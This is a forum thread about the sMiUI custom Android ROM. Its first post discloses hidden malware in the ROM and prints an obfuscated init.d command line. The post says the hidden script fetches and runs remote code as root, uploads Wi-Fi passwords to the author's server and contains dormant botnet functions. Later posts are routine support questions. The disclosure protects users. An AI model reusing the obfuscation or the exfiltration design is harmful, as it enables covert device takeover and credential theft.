[rom]-- Smiui Rom -- Ultimate Custom Rom --[multilang,stable/weekly]

This firmware is malware.
At least it downloads ads. But also it allows the author to take control on your phone.
Just see files /system/bin/api and /system/bin/apiget (also in zip in META-INF/com/google/android/sMiUI-kitchen/tmp/system/bin/).
Scripts from /system/etc/init.d are run at system start. There is a script "01sMIUI_optimizations". It contains a line
Code:
/system/bin/sh `echo "binajkdpjni%usr" | sed 's!^\(...\)\(.\)...\(.\)..\(i\).\(...\)$!/\5/\1/\2\3\4!g'`
echo+sed make string "/system/bin/api" and finally the command is
Code:
/system/bin/sh /system/bin/api
So it just runs "/system/bin/api". And that script does many bad actions, for example:
- loads new version of the script from smiui_net/api and saves it to the system. The author can place there any code and the code will be executed on your phone with root rights!
- it uploads the content of the file "/data/misc/wifi/wpa_supplicant.conf" (your Wi-Fi passwords) to smiui_net/api1.php
- it loads some ads (functions func_PROP, func_REV, func_TOTAL) in the background. In any time, constantly (when it receives "START" from their server)!
- there is also very very bad function func_SRV (+func_FILES), but it is commented (does not run). It makes your phone a part of the botnet! It loads some binaries (they do not exists for now) and looks like they start some tunnel/proxy on the phone.
Mr. Robot? :D
Nice observation! Thank you for registering here only to inform us of that!

At least I can't find the mentioned files in a fresh miui.eu Rom. Maybe im wrong, but as the long as sebsch doesn't comment here, i wount use it any more.

Gesendet von meinem Redmi Note 3 mit Tapatalk

Yup, mistakes were made. But that's what happens sometimes. It's called 'cutting edge'... Sometimes it makes you bleed.

And ppl are (or should) be aware of this.

Now: for making the bleeding stop: communicate everywhere to help ppl patch it. (Pun intended.)

Good luck!

We learn from big mistakes, so do I ...
I trusted the wrong person and he tried to do some fraudental stuff, but he failed..

I re-uploaded the latest 6.8.18 to the kitchen, completely clean!

I wrote about what happened here

Last edited:
really sorry to hear about that big disappointment from your partner sebsch.

thanks a lot for re uploading the roms! u're the man!

edit: in my mi2s with 11.8 i cant find the files in /bin. Anyway i'll download 18.8

Last edited:
Can someone share the scripts from init.d of new and patched 8.18 for a mi4c? don't want to update the rom

found it ...thx anyway

As already stated on smiui website, 01sMIUI_optimizations have exit 0 on the first line of the script... why?

Last edited:
Yup, mistakes were made. But that's what happens sometimes. It's called 'cutting edge'... Sometimes it makes you bleed.

And ppl are (or should) be aware of this.

Now: for making the bleeding stop: communicate everywhere to help ppl patch it. (Pun intended.)

Good luck!
this is why communities exist, what a finding!
Keep the god work pal :)

I am on 6.7.28 and i dont have api and apiget files in system/bin folder

Sent from my Redmi Note 2 using Tapatalk

I updated to latest version sMiUI 6.8.18 my Mi2s and can't find how to change the default home screen.
It was a 3 finger pinch before but now this does nothing. I want to do this:
024346rc116c3g3gbtjgz5.png.thumb.jpg

I updated to latest version sMiUI 6.8.18 my Mi2s and can't find how to change the default home screen.
It was a 3 finger pinch before but now this does nothing. I want to do this:
024346rc116c3g3gbtjgz5.png.thumb.jpg
Deactivate 3 fingers to screenshots in settings, more settings (below battery and storage settings), screenshots.

Update to the latest, can t change wallpaper in the lockscreen anymore.
Doesn t say apply to lockscreen as well anymore.

Help?

Update to the latest, can t change wallpaper in the lockscreen anymore.
Doesn t say apply to lockscreen as well anymore.

Help?

In themes app choose wallpaper and from there you can choose lock screen or home screen
or in settings personal wallpaper

Reactions: Lomax84
Tagchen,

i don't know which Rom to install. At MI3's room kitchen there is just miui 8 stable and xiaomi.eu's 6.8.25. I'd love to stay on smiui. Where can I find it?

Greetings!

in my mi4c the last update 6.8.25 causes error in gallery app; i cooked and flashed the rom two times with the same result; i went back to 6.8.18 that works well and have good battery

I'm using Mi4c and miui8 stable is not stable at all. Phone gets very hot, keeps restarting frequently. I revert to 6.8.18, it is working well.

Last edited:
Confirmed, latest smiui reboots some times, battery got very hot yesterday. Screenshot and Share lets the app Crash.

Gesendet von meinem Redmi Note 3 mit Tapatalk